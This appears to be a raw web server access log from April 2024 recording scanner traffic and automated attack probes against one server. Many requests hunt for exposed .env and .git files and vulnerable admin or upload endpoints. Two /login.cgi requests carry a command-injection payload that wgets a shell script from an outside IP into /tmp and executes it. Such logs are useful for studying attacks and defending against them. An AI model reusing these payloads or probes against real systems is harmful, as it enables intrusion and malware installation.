64.62.197.15 - - [13/Apr/2024:08:09:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
64.62.197.5 - - [13/Apr/2024:08:12:55 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.62.197.3 - - [13/Apr/2024:08:13:48 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
146.19.24.28 - - [13/Apr/2024:08:17:13 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
83.97.73.245 - - [13/Apr/2024:08:43:20 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
196.196.53.91 - - [13/Apr/2024:09:17:54 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
66.240.205.34 - - [13/Apr/2024:09:20:14 +0200] "Gh0st\xad" 400 383 "-" "-"
64.23.227.201 - - [13/Apr/2024:09:24:45 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
146.19.24.28 - - [13/Apr/2024:09:27:19 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
45.125.66.34 - - [13/Apr/2024:10:09:26 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
146.19.24.28 - - [13/Apr/2024:10:12:08 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
62.210.145.124 - - [13/Apr/2024:10:29:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
185.150.26.246 - - [13/Apr/2024:10:30:30 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
78.153.140.179 - - [13/Apr/2024:10:36:25 +0200] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.179 - - [13/Apr/2024:10:36:26 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.203.210.143 - - [13/Apr/2024:10:44:41 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.18 - - [13/Apr/2024:11:40:16 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
64.62.156.120 - - [13/Apr/2024:11:40:29 +0200] "\x16\x03\x01" 400 383 "-" "-"
185.224.128.43 - - [13/Apr/2024:11:48:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.31 - - [13/Apr/2024:11:49:34 +0200] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.31 - - [13/Apr/2024:11:49:34 +0200] "\x16\x03\x01" 400 383 "-" "-"
46.174.191.30 - - [13/Apr/2024:11:52:31 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
92.246.91.43 - - [13/Apr/2024:12:21:35 +0200] "GET /.env HTTP/1.1" 404 280 "-" "python-requests/2.26.0"
92.246.91.43 - - [13/Apr/2024:12:21:35 +0200] "POST / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
104.152.52.142 - - [13/Apr/2024:13:12:16 +0200] "GET / HTTP/1.0" 200 423 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
146.19.24.28 - - [13/Apr/2024:13:17:33 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
80.66.83.49 - - [13/Apr/2024:14:16:44 +0200] "-" 408 - "-" "-"
80.66.83.49 - - [13/Apr/2024:14:17:04 +0200] "-" 408 - "-" "-"
80.66.83.49 - - [13/Apr/2024:14:17:04 +0200] "CONNECT 80.66.83.49:80 HTTP/1.1" 200 423 "-" "-"
194.38.23.16 - - [13/Apr/2024:15:28:09 +0200] "GET /administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php HTTP/1.1" 404 453 "-" "ALittle Client"
194.38.23.16 - - [13/Apr/2024:15:28:09 +0200] "GET /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php HTTP/1.1" 404 432 "-" "ALittle Client"
194.38.23.16 - - [13/Apr/2024:15:28:10 +0200] "GET /administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php HTTP/1.1" 404 439 "-" "ALittle Client"
194.38.23.16 - - [13/Apr/2024:15:28:12 +0200] "GET /administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php HTTP/1.1" 404 452 "-" "ALittle Client"
194.38.23.16 - - [13/Apr/2024:15:28:13 +0200] "GET /administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php HTTP/1.1" 404 466 "-" "ALittle Client"
194.38.23.16 - - [13/Apr/2024:15:28:15 +0200] "GET /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php HTTP/1.1" 404 445 "-" "ALittle Client"
45.79.181.251 - - [13/Apr/2024:15:30:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.181.251 - - [13/Apr/2024:16:00:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
1.136.16.184 - - [13/Apr/2024:16:01:49 +0200] "GET /Pelago/chat_connect.png HTTP/1.1" 404 301 "http://widget.mibbit.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/107.0.0.0"
1.136.16.184 - - [13/Apr/2024:16:02:10 +0200] "-" 408 - "-" "-"
3.88.194.34 - - [13/Apr/2024:16:20:06 +0200] "GET /.git/config HTTP/1.1" 404 296 "-" "Mozilla/5.0 (X11; CrOS aarch64 15236.9.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
104.211.2.187 - - [13/Apr/2024:16:57:13 +0200] "GET /manager/html HTTP/1.1" 404 283 "-" "Go-http-client/1.1"
167.94.138.127 - - [13/Apr/2024:17:12:58 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.138.127 - - [13/Apr/2024:17:13:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.127 - - [13/Apr/2024:17:13:02 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
167.94.138.127 - - [13/Apr/2024:17:13:02 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.127 - - [13/Apr/2024:17:13:03 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
37.139.5.66 - - [13/Apr/2024:17:43:50 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
185.224.128.43 - - [13/Apr/2024:17:45:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.196.53.91 - - [13/Apr/2024:18:30:37 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:84.0) Gecko/20100101 Firefox/84.0"
109.87.106.82 - - [13/Apr/2024:18:53:27 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
46.174.191.30 - - [13/Apr/2024:19:19:29 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
69.164.217.74 - - [13/Apr/2024:19:35:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
118.26.39.177 - - [13/Apr/2024:19:53:28 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
47.128.35.53 - - [13/Apr/2024:20:03:36 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
206.189.156.82 - - [13/Apr/2024:20:05:04 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.6364.1205 Mobile Safari/537.36"
47.128.119.24 - - [13/Apr/2024:20:05:24 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
68.183.227.247 - - [13/Apr/2024:20:05:45 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.1735.1834 Mobile Safari/537.36"
146.19.24.28 - - [13/Apr/2024:20:25:56 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
92.246.91.43 - - [13/Apr/2024:20:30:20 +0200] "GET /.env HTTP/1.1" 404 280 "-" "python-requests/2.26.0"
92.246.91.43 - - [13/Apr/2024:20:30:20 +0200] "POST / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
92.246.91.43 - - [13/Apr/2024:20:36:58 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
92.246.91.43 - - [13/Apr/2024:20:36:58 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.241.183.185 - - [13/Apr/2024:21:17:16 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
146.19.24.28 - - [13/Apr/2024:21:50:41 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
85.234.48.164 - - [13/Apr/2024:21:53:04 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
23.225.104.146 - - [13/Apr/2024:22:04:27 +0200] "GET /elfinder/elfinder.html HTTP/1.1" 404 374 "-" "ALittle Client"
23.225.104.146 - - [13/Apr/2024:22:04:45 +0200] "GET /js/elfinder/php/connector.php HTTP/1.1" 404 394 "-" "ALittle Client"
23.225.104.146 - - [13/Apr/2024:22:04:46 +0200] "GET /elfinder/php/connector.php HTTP/1.1" 404 391 "-" "ALittle Client"
185.224.128.43 - - [13/Apr/2024:22:21:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
159.65.91.96 - - [13/Apr/2024:22:41:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
146.19.24.28 - - [13/Apr/2024:23:26:56 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
196.196.53.91 - - [13/Apr/2024:23:38:15 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:69.0) Gecko/20100101 Firefox/69.0"
45.33.80.243 - - [14/Apr/2024:00:03:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
194.120.230.95 - - [14/Apr/2024:00:21:26 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
192.241.236.82 - - [14/Apr/2024:00:26:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
205.210.31.14 - - [14/Apr/2024:00:27:24 +0200] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.14 - - [14/Apr/2024:00:27:24 +0200] "\x16\x03\x01" 400 383 "-" "-"
37.143.129.124 - - [14/Apr/2024:00:47:05 +0200] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 11.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5814.214 Safari/537.36"
194.120.230.94 - - [14/Apr/2024:01:13:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.98.51.91 - - [14/Apr/2024:01:42:23 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.180.143.137 - - [14/Apr/2024:01:58:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"